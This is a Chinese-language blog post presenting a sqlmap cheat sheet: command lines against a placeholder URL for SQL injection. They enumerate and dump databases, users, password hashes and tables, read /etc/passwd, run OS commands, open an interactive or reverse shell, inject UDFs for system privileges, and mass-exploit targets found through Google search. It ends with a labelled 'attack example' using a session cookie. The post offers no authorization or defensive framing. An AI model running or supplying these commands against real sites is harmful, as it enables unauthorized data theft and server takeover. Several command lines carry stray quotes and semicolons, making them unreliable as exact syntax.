sqlmap使用手册

最新推荐文章于 2023-06-20 08:07:55 发布

summe_blue

最新推荐文章于 2023-06-20 08:07:55 发布

阅读量878

点赞数 2

分类专栏： Web安全

版权声明：本文为博主原创文章，遵循 CC 4.0 BY-SA 版权协议，转载请附上原文出处链接和本声明。

本文链接：https://blog.csdn.net/sufeiboy/article/details/79522270

版权

Web安全专栏收录该内容

7 篇文章 0 订阅

订阅专栏

更新升级:

sqlmap -update

svn checkout https://svn.sqlmap.org/sqlmap/trunk/sqlmap sqlmap-dev

帮助:

sqlmap -h

****************** 基本步骤 ***************

sqlmap -u" http://url/news?id=1"; --current-user #获取当前用户名称

sqlmap -u" http://www.xxoo.com/news?id=1"; --current-db #获取当前数据库名称

sqlmap -u" http://www.xxoo.com/news?id=1"; --tables -D "db_name" #列表名

sqlmap -u" http://url/news?id=1"; --columns -T "tablename" users-D "db_name" -v0 #列字段

sqlmap -u" http://url/news?id=1"; --dump -C "column_name" -T "table_name" -D "db_name" -v 0 #获取字段内容

****************** 信息获取 ******************

sqlmap -u" http://url/news?id=1"; --smart --level 3 --users # smart 智能 level 执行测试等级

sqlmap -u" http://url/news?id=1" ; --dbms "Mysql" --users # dbms 指定数据库类型

sqlmap -u" http://url/news?id=1"; --users #列数据库用户

sqlmap -u" http://url/news?id=1"; --dbs#列数据库

sqlmap -u" http://url/news?id=1"; --passwords #数据库用户密码

sqlmap -u" http://url/news?id=1"; --passwords-U root -v0 #列出指定用户数据库密码

sqlmap -u" http://url/news?id=1"; --dump -C "password,user,id" -T "tablename" -D "db_name" - -start 1 --stop 20 #列出指定字段，列出 20 条

sqlmap -u" http://url/news?id=1"; --dump-all -v 0 #列出所有数据库所有表

sqlmap -u" http://url/news?id=1"; --privileges #查看权限

sqlmap -u" http://url/news?id=1"; --privileges -U root #查看指定用户权限

sqlmap -u" http://url/news?id=1"; --is-dba -v1 #是否是数据库管理员

sqlmap -u" http://url/news?id=1"; --roles #枚举数据库用户角色

sqlmap -u" http://url/news?id=1"; --udf-inject #导入用户自定义函数（获取系统权限！）

sqlmap -u" http://url/news?id=1"; --dump-all --exclude-sysdbs -v0 #列出当前库所有表

sqlmap -u" http://url/news?id=1"; --union-cols #union 查询表记录

sqlmap -u" http://url/news?id=1"; --cookie "COOKIE_VALUE" #cookie 注入

sqlmap -u" http://url/news?id=1"; -b#获取 banner 信息

sqlmap -u" http://url/news?id=1"; --data "id=3" #post 注入

sqlmap -u" http://url/news?id=1"; -v1 -f #指纹判别数据库类型

sqlmap -u" http://url/news?id=1"; --proxy" http://127.0.0.1:8118"; #代理注入

sqlmap -u" http://url/news?id=1"--string"STRING_ON_TRUE_PAGE"; #指定关键词

sqlmap -u" http://url/news?id=1"; --sql-shell #执行指定 sql 命令

sqlmap -u" http://url/news?id=1"; --file /etc/passwd

sqlmap -u" http://url/news?id=1"; --os-cmd=whoami #执行系统命令

sqlmap -u" http://url/news?id=1"; --os-shell #系统交互 shell

sqlmap -u" http://url/news?id=1"; --os-pwn #反弹 shell

sqlmap -u" http://url/news?id=1"; --reg-read #读取 win 系统注册表

sqlmap -u" http://url/news?id=1"; --dbs-o"sqlmap.log" #保存进度

sqlmap -u" http://url/news?id=1"; --dbs -o"sqlmap.log" --resume #恢复已保存进度

sqlmap -g"google 语法 " --dump-all --batch #google 搜索注入点自动跑出所有字段

攻击实例 :

sqlmap -u" http://url/news?id=1&Submit=Submit"; --cookie="PHPSESSID=41aa833e6d0d 28f489ff1ab5a7531406" --string="Surname" --dbms=mysql --users --password

关注

2
点赞
踩
18

收藏

觉得还不错? 一键收藏
0
评论
sqlmap使用手册

更新升级:sqlmap -updatesvn checkout https://svn.sqlmap.org/sqlmap/trunk/sqlmap sqlmap-dev帮助:sqlmap -h****************** 基本步骤 ***************sqlmap -u"http://url/news?id=1"; --current-user #获取当前用户名称sql...
复制链接

扫一扫

专栏目录

评论

被折叠的条评论为什么被折叠?

到【灌水乐园】发言

查看更多评论

添加红包

成就一亿技术人!

hope_wisdom

发出的红包

实付元

使用余额支付

点击重新获取

扫码支付

钱包余额 0

抵扣说明：

1.余额是钱包充值的虚拟货币，按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载，可以购买VIP、付费专栏及课程。